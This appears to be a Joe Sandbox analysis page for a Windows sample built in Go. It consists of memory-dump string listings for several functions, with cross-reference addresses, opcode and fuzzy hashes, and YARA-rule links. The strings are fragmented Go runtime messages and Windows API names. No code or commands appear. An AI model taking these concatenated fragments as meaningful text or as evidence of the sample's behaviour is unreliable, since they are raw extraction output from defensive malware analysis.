work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32Snaps, xrefs: 00A79925
work.nwait was > work.nproc args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextEnglish n, xrefs: 00A79985
worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: , xrefs: 00A799BB

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_Gondi$ work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_GondiMapViewOfFile$GC worker initGetConsoleModeGetProcAddressGetShellWindowGetTickCount64GetUserNameExWIsWellKnownSidIsWow64ProcessLoadLibraryExWMB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoOpenSCManagerWOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRCodeNam$gcBgMarkWorker: blackening not enabledindex out of range [%x] with length %yinsufficient data for base length typeinternal error: exit hook invoked exitm changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free po$gcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol$runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stackstring concatenation too longsyntax error scanning boolea$runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2%SystemRoot%\system32\4656612873077392578125Aleuti$work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32Snaps$work.nwait was > work.nproc args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextEnglish n$worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625:
API String ID: 0-2460870723
Opcode ID: b5d56e091250636aecbb29a3aa3bb90f6a6e3800429de7991bac37d1de2404d1
Instruction ID: 94e7daea2e6579b98775cf92f01ca031cd911ceef4177139ca8992283e32d2a0
Opcode Fuzzy Hash: b5d56e091250636aecbb29a3aa3bb90f6a6e3800429de7991bac37d1de2404d1
Instruction Fuzzy Hash: 37C1EE32314B84C6EB10DF25E98079EB7B4F78AB90F549226EA5C43765DF38C458CB50

Function 00A79BC0 Relevance: 12.7, Strings: 10, Instructions: 232COMMON

Download Yara Rule

Strings

work.full != 0 with GC prog,M3.2.0,M11.1.0476837158203125: no frame (sp=<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGetAda, xrefs: 00A79EAF
flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsEx, xrefs: 00A79DA5
P has cached GC work at end of mark terminationRtlDosPathNameToRelativeNtPathName_U_WithStatusattempting to link in too many shared librariesfailed to acquire lock to start a GC transitionfinishGCTransition called without starting one?function symbol table not, xrefs: 00A79E5B
jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTa, xrefs: 00A79F4F
wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFileWNabataeanPalmyrenePurgeCommSamarita, xrefs: 00A79DED
runtime: full=runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.PointeruserArenaStatewinapi error #work.full != 0 with G, xrefs: 00A79F10
in gcMark expecting to see gcphase as _GCmarkterminationnon-empty pointer map passed for non-pointer-size valuesprofilealloc called without a P or outside bootstrappingstrings: illegal use of non-zero Builder copied by value (set GODEBUG=execwait=2 to capture , xrefs: 00A7A00C
nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACE, xrefs: 00A79F8F
next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTy, xrefs: 00A79F2F
runtime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllshell32.dllshort writestack tracetracealloc(unreachableuserenv.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataR, xrefs: 00A79D85

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsEx$ jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTa$ nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACE$ next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTy$ wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFileWNabataeanPalmyrenePurgeCommSamarita$P has cached GC work at end of mark terminationRtlDosPathNameToRelativeNtPathName_U_WithStatusattempting to link in too many shared librariesfailed to acquire lock to start a GC transitionfinishGCTransition called without starting one?function symbol table not$in gcMark expecting to see gcphase as _GCmarkterminationnon-empty pointer map passed for non-pointer-size valuesprofilealloc called without a P or outside bootstrappingstrings: illegal use of non-zero Builder copied by value (set GODEBUG=execwait=2 to capture $runtime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllshell32.dllshort writestack tracetracealloc(unreachableuserenv.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataR$runtime: full=runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.PointeruserArenaStatewinapi error #work.full != 0 with G$work.full != 0 with GC prog,M3.2.0,M11.1.0476837158203125: no frame (sp=<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGetAda
API String ID: 0-2464777378
Opcode ID: 09045b66f6dff95414e2b5bad32c8f30da6f985754caec3375fd21c2f0eff00f
Instruction ID: aa612331a11eec25aa00bff678eee308af120ab9b242b8202c0d4b4e4390cdd1
Opcode Fuzzy Hash: 09045b66f6dff95414e2b5bad32c8f30da6f985754caec3375fd21c2f0eff00f
Instruction Fuzzy Hash: 3BB11735318B44C6EB10EB25E9813AEB7B4FB89B80F549522EA4D07776DF38C945CB60

Function 00A991A0 Relevance: 12.7, Strings: 10, Instructions: 196COMMON

Download Yara Rule

Strings

runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro, xrefs: 00A99295, 00A99425
, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi, xrefs: 00A99350, 00A994EF
runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is already connected13877787807814456755295395851135253906256938893903907228377647697, xrefs: 00A9920B
runtime: casfrom_Gscanstatus bad oldval gp=runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapactive sweepers found at start of mark phasec, xrefs: 00A99390
, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS, xrefs: 00A992B0, 00A99335, 00A99445, 00A994CF
casfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipmheap.freeSpanLocked - invalid free of user arena chunkos: invalid use of WriteAt on file opened with O_APPENDreflect: internal error: invalid use of , xrefs: 00A9951A
casfrom_Gscanstatus: gp->status is not in scan statemallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Init, xrefs: 00A9937A
, newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFileWNabataeanPalmyrenePurgeCommSamaritanSeptemberSetupCommSundanes, xrefs: 00A99245, 00A993D0
, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFileWNabataeanPalmyrenePurgeCommSamaritanSeptemberSetupCommSundaneseTypeCNAM, xrefs: 00A99226, 00A993AF
, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f, xrefs: 00A992CF, 00A99465

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: , g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi$, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS$, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f$, newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFileWNabataeanPalmyrenePurgeCommSamaritanSeptemberSetupCommSundanes$, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFileWNabataeanPalmyrenePurgeCommSamaritanSeptemberSetupCommSundaneseTypeCNAM$casfrom_Gscanstatus: gp->status is not in scan statemallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Init$casfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipmheap.freeSpanLocked - invalid free of user arena chunkos: invalid use of WriteAt on file opened with O_APPENDreflect: internal error: invalid use of $runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro$runtime: casfrom_Gscanstatus bad oldval gp=runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapactive sweepers found at start of mark phasec$runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is already connected13877787807814456755295395851135253906256938893903907228377647697
API String ID: 0-1536163806
Opcode ID: 2711663dc1a558950b17083f79c48e7114fe6162447beeb0e8026b55b51a51a0
Instruction ID: ec1eda68bcd18deaf7cad73b338ba7cb9531b63d5856fa20053b7ae47334d447
Opcode Fuzzy Hash: 2711663dc1a558950b17083f79c48e7114fe6162447beeb0e8026b55b51a51a0
Instruction Fuzzy Hash: 0D91FA36328B809ADB10FB24E98135EBBE4FB89780F445565FE4D47726DF38C9049B61

Function 00A67160 Relevance: 12.7, Strings: 10, Instructions: 189COMMON

Download Yara Rule

Strings

call not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreach, xrefs: 00A67452, 00A6745E
call from unknown functioncannot marshal DNS messagecorrupted semaphore ticketentersyscall inconsistent forEachP: P did not run fnfreedefer with d.fn != nilinvalid request descriptorname not unique on networknegative idle mark workersno CSI structure available, xrefs: 00A671AD, 00A671B9
runtime., xrefs: 00A673B6
debugCal, xrefs: 00A67350
debugCal, xrefs: 00A6730E
debugCal, xrefs: 00A672B8
debugCal, xrefs: 00A67252
l655, xrefs: 00A67395
call from within the Go runtimecannot assign requested addresscasgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid netw, xrefs: 00A673DB, 00A673E7
debugCal, xrefs: 00A671F3

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: call from unknown functioncannot marshal DNS messagecorrupted semaphore ticketentersyscall inconsistent forEachP: P did not run fnfreedefer with d.fn != nilinvalid request descriptorname not unique on networknegative idle mark workersno CSI structure available$call from within the Go runtimecannot assign requested addresscasgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid netw$call not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreach$debugCal$debugCal$debugCal$debugCal$debugCal$l655$runtime.
API String ID: 0-1569313557
Opcode ID: 195982d2cf3918bee297cc41014bff5aed64f42cd78685072836da3fc1a8e946
Instruction ID: 3e36398053f43c1bc569ff3130c1b2b624dd5338c6e5335d3edbbd51f8f76406
Opcode Fuzzy Hash: 195982d2cf3918bee297cc41014bff5aed64f42cd78685072836da3fc1a8e946
Instruction Fuzzy Hash: 0C719CB2A2DA80C5CE398B19D15173D7771E3A5BDCF58C426DB4A0B724EB78C884D702

Function 00A6BD00 Relevance: 12.7, Strings: 10, Instructions: 160COMMON

Download Yara Rule

Strings

failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid network interface nameinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socketreflect: Elem of invalid type reflect: Len of non-, xrefs: 00A6BFEC
) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetActi, xrefs: 00A6BE96, 00A6BEE5
bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid DNS response, xrefs: 00A6BEFB, 00A6BF6A, 00A6BFDB
system huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorWCape Verde Standard Tim, xrefs: 00A6BE79
), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE, xrefs: 00A6BF4F, 00A6BFC5
system page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard Ti, xrefs: 00A6BEC5, 00A6BF11, 00A6BF85
bad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno answer from DNS serverno buffer , xrefs: 00A6BEAC
) is smaller than minimum page size (2220446049250313080847263336181640625UnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!cannot exec a shared library directlyfailed to reserve page summary memoryi, xrefs: 00A6BF31
bad TinySizeClassentersyscallblockexec format errorexec: killing Cmdexec: not startedg already scannedgp.waiting != nillocked m0 woke upmark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission deniedreflect.Value.Intrefle, xrefs: 00A6BFFD
) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memoryUnable to determine system directoryaccessed data from freed user arena accessin, xrefs: 00A6BFA5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
